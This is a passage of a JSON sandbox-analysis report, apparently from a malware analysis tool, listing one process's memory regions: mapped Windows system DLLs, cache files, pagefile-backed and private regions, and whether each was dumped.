"pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 4526079, "entry_point": 0, "filename": null, "id": "region_473", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:00:23.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 17170431, "entry_point": 0, "filename": null, "id": "region_474", "name": "pagefile_0x0000000000460000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4587520, "timestamp": "00:00:23.913", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000475-addr_0x00000000011b0000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 18546688, "type": "region", "version": 1 }, "end_va": 18808831, "entry_point": 0, "filename": null, "id": "region_475", "name": "private_0x00000000011b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 18546688, "timestamp": "00:00:23.913", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000476-addr_0x0000000001210000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 18939904, "type": "region", "version": 1 }, "end_va": 19005439, "entry_point": 0, "filename": null, "id": "region_476", "name": "private_0x0000000001210000", "norm_filename": null, "region_type": "private_memory", "start_va": 18939904, "timestamp": "00:00:23.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_477", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:00:23.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_478", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:23.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3280895, "entry_point": 0, "filename": null, "id": "region_479", "name": "pagefile_0x0000000000320000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3276800, "timestamp": "00:00:23.922", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000480-addr_0x0000000001090000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 17367040, "type": "region", "version": 1 }, "end_va": 17629183, "entry_point": 0, "filename": null, "id": "region_480", "name": "private_0x0000000001090000", "norm_filename": null, "region_type": "private_memory", "start_va": 17367040, "timestamp": "00:00:23.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 17629184, "type": "region", "version": 1 }, "end_va": 18542591, "entry_point": 0, "filename": null, "id": "region_481", "name": "pagefile_0x00000000010d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17629184, "timestamp": "00:00:23.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_482", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:23.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 0, "filename": null, "id": "region_483", "name": "pagefile_0x0000000000330000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3342336, "timestamp": "00:00:23.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_484", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:23.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957625856, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_485", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:00:23.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_486", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:23.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 17170432, "type": "region", "version": 1 }, "end_va": 17178623, "entry_point": 0, "filename": null, "id": "region_487", "name": "pagefile_0x0000000001060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17170432, "timestamp": "00:00:23.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 17235968, "type": "region", "version": 1 }, "end_va": 17240063, "entry_point": 0, "filename": null, "id": "region_488", "name": "pagefile_0x0000000001070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17235968, "timestamp": "00:00:23.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 17301504, "type": "region", "version": 1 }, "end_va": 17309695, "entry_point": 0, "filename": null, "id": "region_489", "name": "pagefile_0x0000000001080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 17301504, "timestamp": "00:00:23.966", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 21950463, "entry_point": 19005440, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_490", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19005440, "timestamp": "00:00:23.966", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000491-addr_0x0000000001510000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 22085632, "type": "region", "version": 1 }, "end_va": 22347775, "entry_point": 0, "filename": null, "id": "region_491", "name": "private_0x0000000001510000", "norm_filename": null, "region_type": "private_memory", "start_va": 22085632, "timestamp": "00:00:23.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_492", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:23.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_493", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:00:23.968", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000494-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_494", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:23.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_495", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:23.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_496", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:00:23.972", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 18874368, "type": "region", "version": 1 }, "end_va": 18878463, "entry_point": 0, "filename": null, "id": "region_497", "name": "pagefile_0x0000000001200000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 18874368, "timestamp": "00:00:23.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 22347776, "type": "region", "version": 1 }, "end_va": 22503423, "entry_point": 22347776, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_498", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 22347776, "timestamp": "00:00:23.988", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_499", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:00:23.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_500", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:00:23.989", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_501", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:23.990", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000502-addr_0x0000000001580000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 22544384, "type": "region", "version": 1 }, "end_va": 23592959, "entry_point": 0, "filename": null, "id": "region_502", "name": "private_0x0000000001580000", "norm_filename": null, "region_type": "private_memory", "start_va": 22544384, "timestamp": "00:00:24.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 23592960, "type": "region", "version": 1 }, "end_va": 27734015, "entry_point": 0, "filename": null, "id": "region_503", "name": "pagefile_0x0000000001680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 23592960, "timestamp": "00:00:24.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901133824, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_504", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:00:24.039", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 1863450624, "type": "region", "version": 1 }, "end_va": 1863639039, "entry_point": 1863450624, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_505", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 1863450624, "timestamp": "00:00:24.053", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000506-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28180480, "type": "region", "version": 1 }, "end_va": 28442623, "entry_point": 0, "filename": null, "id": "region_506", "name": "private_0x0000000001ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28180480, "timestamp": "00:00:24.321", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000507-addr_0x0000000001b40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28573696, "type": "region", "version": 1 }, "end_va": 28835839, "entry_point": 0, "filename": null, "id": "region_507", "name": "private_0x0000000001b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 28573696, "timestamp": "00:00:24.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1863385088, "type": "region", "version": 1 }, "end_va": 1863421951, "entry_point": 1863390526, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_508", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1863385088, "timestamp": "00:00:24.322", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_509", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:24.322", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000510-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_510", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:24.322", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 18808832, "type": "region", "version": 1 }, "end_va": 18825215, "entry_point": 18808832, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_511", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 18808832, "timestamp": "00:00:24.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 21954560, "type": "region", "version": 1 }, "end_va": 21970943, "entry_point": 21954560, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_512", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 21954560, "timestamp": "00:00:24.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 27787264, "type": "region", "version": 1 }, "end_va": 27983871, "entry_point": 27787264, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_513", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 27787264, "timestamp": "00:00:24.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 29253631, "entry_point": 28835840, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_514", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 28835840, "timestamp": "00:00:24.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1880096768, "type": "region", "version": 1 }, "end_va": 1880555519, "entry_point": 1880104805, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_515", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1880096768, "timestamp": "00:00:24.336", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_516", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:24.337", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000517-addr_0x0000000001db0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 31129600, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_517", "name": "private_0x0000000001db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31129600, "timestamp": "00:00:24.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1880555520, "type": "region", "version": 1 }, "end_va": 1880600575, "entry_point": 1880560128, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_518", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1880555520, "timestamp": "00:00:24.342", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000519-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_519", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:24.343", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1947795456, "type": "region", "version": 1 }, "end_va": 1947836415, "entry_point": 1947815200, "filename": "\\Windows\\System32\\slc.dll", "id": "region_520", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1947795456, "timestamp": "00:00:24.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_521", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:00:24.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_522", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:00:24.376", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1675100160, "type": "region", "version": 1 }, "end_va": 1675599871, "entry_point": 1675108168, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_523", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1675100160, "timestamp": "00:00:24.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 22020096, "type": "region", "version": 1 }, "end_va": 22024191, "entry_point": 0, "filename": null, "id": "region_524", "name": "pagefile_0x0000000001500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 22020096, "timestamp": "00:00:24.610", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000525-addr_0x0000000001c20000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 29491200, "type": "region", "version": 1 }, "end_va": 29753343, "entry_point": 0, "filename": null, "id": "region_525", "name": "private_0x0000000001c20000", "norm_filename": null, "region_type": "private_memory", "start_va": 29491200, "timestamp": "00:00:24.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1663369216, "type": "region", "version": 1 }, "end_va": 1669312511, "entry_point": 1663369216, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_526", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1663369216, "timestamp": "00:00:24.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1830289408, "type": "region", "version": 1 }, 